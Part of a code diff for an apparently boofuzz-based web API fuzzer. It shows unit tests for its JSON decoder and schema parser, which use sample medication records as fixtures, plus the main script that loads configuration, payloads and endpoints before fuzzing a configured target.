def log_pass(self, description=""):
self._print_log_msg(msg=description, msg_type='pass')
def close_test_case(self):
print()
def close_test(self):
pass
def _print_log_msg(self, msg_type, msg=None, data=None):
print(helpers.format_log_msg(msg_type=msg_type, description=msg, data=data, indent_size=self.INDENT_SIZE))

113
fuzzer/src/unit_tests/fuzzing_json_decoder_tests.py Normal file
View File

@@ -0,0 +1,113 @@
import unittest
import json
from boofuzz import *
from fuzzing_json_decoder import FuzzingJsonDecoder
from fuzz_payloads import FuzzPayloads
class FuzzingJsonDecoderTests(unittest.TestCase):
def setUp(self):
# Just init block for boofuzz
s_initialize(self.id())
# Generate at least few payloads for at least minimum number of mutations
FuzzPayloads.add_payload_to_list("payload 1", FuzzPayloads.CUSTOM_PAYLOADS_KEY)
FuzzPayloads.add_payload_to_list("payload 2", FuzzPayloads.CUSTOM_PAYLOADS_KEY)
def __json_equality_assertion(self, original_json, generated_json):
self.assertDictEqual(json.loads(original_json), json.loads(generated_json))
def test_empty_dict(self):
# Prepare
original_json = '{}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_empty_list(self):
# Prepare
original_json = '{"array": []}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_dict_primitives(self):
# Prepare
original_json = '{"array": [{"primitives": {"1": 1, "2": 1e1, "3": false, "4": null}}]}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_nested_dict(self):
# Prepare
original_json = '{ "problems": [{ "Diabetes":[{ "medications":[{ "medicationsClasses":[{ "className":[{ "associatedDrug":[{ "name":"asprin", "dose":"", "strength":"500 mg" }], "associatedDrug#2":[{ "name":"somethingElse", "dose":"", "strength":"500 mg" }] }], "className2":[{ "associatedDrug":[{ "name":"asprin", "dose":"", "strength":"500 mg" }], "associatedDrug#2":[{ "name":"somethingElse", "dose":"", "strength":"500 mg" }] }] }] }], "labs":[{ "missing_field": "missing_value" }] }], "Asthma":[{}] }]}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_huge_dict(self):
# Prepare
original_json = ' { "medications":[{ "aceInhibitors":[{ "name":"lisinopril", "strength":"10 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "antianginal":[{ "name":"nitroglycerin", "strength":"0.4 mg Sublingual Tab", "dose":"1 tab", "route":"SL", "sig":"q15min PRN", "pillCount":"#30", "refills":"Refill 1" }], "anticoagulants":[{ "name":"warfarin sodium", "strength":"3 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "betaBlocker":[{ "name":"metoprolol tartrate", "strength":"25 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "diuretic":[{ "name":"furosemide", "strength":"40 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "mineral":[{ "name":"potassium chloride ER", "strength":"10 mEq Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }] } ], "labs":[{ "name":"Arterial Blood Gas", "time":"Today", "location":"Main Hospital Lab" }, { "name":"BMP", "time":"Today", "location":"Primary Care Clinic" }, { "name":"BNP", "time":"3 Weeks", "location":"Primary Care Clinic" }, { "name":"BUN", "time":"1 Year", "location":"Primary Care Clinic" }, { "name":"Cardiac Enzymes", "time":"Today", "location":"Primary Care Clinic" }, { "name":"CBC", "time":"1 Year", "location":"Primary Care Clinic" }, { "name":"Creatinine", "time":"1 Year", "location":"Main Hospital Lab" }, { "name":"Electrolyte Panel", "time":"1 Year", "location":"Primary Care Clinic" }, { "name":"Glucose", "time":"1 Year", "location":"Main Hospital Lab" }, { "name":"PT/INR", "time":"3 Weeks", "location":"Primary Care Clinic" }, { "name":"PTT", "time":"3 Weeks", "location":"Coumadin Clinic" }, { "name":"TSH", "time":"1 Year", "location":"Primary Care Clinic" } ], "imaging":[{ "name":"Chest X-Ray", "time":"Today", "location":"Main Hospital Radiology" }, { "name":"Chest X-Ray", "time":"Today", "location":"Main Hospital Radiology" }, { "name":"Chest X-Ray", "time":"Today", "location":"Main Hospital Radiology" } ] }'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_dicts_in_array(self):
# Prepare
original_json = '{ "one": { "two": [{ "four": { "name": "four1_name" } }, { "four": { "name": "four2_name" } }] } }'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_that_quotation_marks_are_not_added_into_default_values(self):
# Prepare
original_json = '{ "one": false, "two": 0 }'
# Action
decoder = FuzzingJsonDecoder(True)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
if __name__ == '__main__':
unittest.main()

68
fuzzer/src/unit_tests/json_schema_parser_tests.py Normal file
View File

@@ -0,0 +1,68 @@
import unittest
import json
from json_schema_parser import generate_json_dict_from_schema
class FuzzingJsonDecoderTests(unittest.TestCase):
def test_single_bool_primitive(self):
# Prepare
original_json_schema = '{"test": {"Title": null,"Type": "boolean","Format": null,"Example": null}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue(isinstance(generated_json["test"], bool))
self.assertEqual(generated_json["test"], True)
def test_nested_string_primitive_with_example(self):
# Prepare
original_json_schema = '{"test": {"nested": {"Title": null,"Type": "string","Format": null,"Example": "example"}}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue("nested" in generated_json["test"])
self.assertTrue(isinstance(generated_json["test"]["nested"], str))
self.assertEqual(generated_json["test"]["nested"], "example")
def test_array_with_primitive(self):
# Prepare
original_json_schema = '{"test": {"Type": "array","ArrayItemSchema": {"Title": null,"Type": "number","Format": "double","Example": null}}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue(isinstance(generated_json["test"], list))
self.assertTrue(isinstance(generated_json["test"][0], float))
self.assertEqual(generated_json["test"][0], 0.0)
def test_array_with_complex_object(self):
# Prepare
original_json_schema = '{"test": {"Type": "array","ArrayItemSchema": {"nested1": {"Title": null,"Type": "string","Format": null,"Example": "example"},"nested2": {"Title": null,"Type": "integer","Format": null,"Example": null}}}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue(isinstance(generated_json["test"], list))
self.assertTrue(isinstance(generated_json["test"][0], dict))
self.assertTrue("nested1" in generated_json["test"][0])
self.assertTrue("nested2" in generated_json["test"][0])
self.assertEqual(generated_json["test"][0]["nested1"], "example")
self.assertEqual(generated_json["test"][0]["nested2"], 0)
if __name__ == '__main__':
unittest.main()

42
fuzzer/src/wfuzz.py Normal file
View File

@@ -0,0 +1,42 @@
import sys
import json
from fuzz_payloads import FuzzPayloads
from text_logger import TextLogger
from junit_logger import JUnitLogger
from payloads.payloads_loader import PayloadsLoader, load_default_payloads
from configuration_manager import ConfigurationManager
from fuzzer import Fuzzer
def main():
config_file_path = sys.argv[1]
endpoints_description = sys.argv[2]
junit_output = sys.argv[3]
custom_payloads_path = sys.argv[4] if len(sys.argv) == 5 else None
with open(config_file_path, 'r') as config_file_pointer:
ConfigurationManager(config_file_pointer)
target = ConfigurationManager.config["target"]
# Load and generate default payloads
load_default_payloads(target["hostname"])
# If user specified file with custom payloads, we add them to our mutations
payloads_loader = PayloadsLoader(target["hostname"])
payloads_loader.load_payloads(custom_payloads_path, FuzzPayloads.CUSTOM_PAYLOADS_KEY)
with open(junit_output, 'w', encoding='utf8') as junit_output_file_pointer:
text_logger = TextLogger()
junit_logger = JUnitLogger(junit_output_file_pointer, test_suite_name_delimiter=":", hostname=target["hostname"])
protocol = 'ssl' if target["ssl"] is True else 'tcp'
with open(endpoints_description, 'r') as endpoints_description_file_pointer:
endpoints = json.loads(endpoints_description_file_pointer.read())
fuzzer = Fuzzer(endpoints, [text_logger, junit_logger], protocol)
fuzzer.fuzz()
if __name__ == '__main__':
main()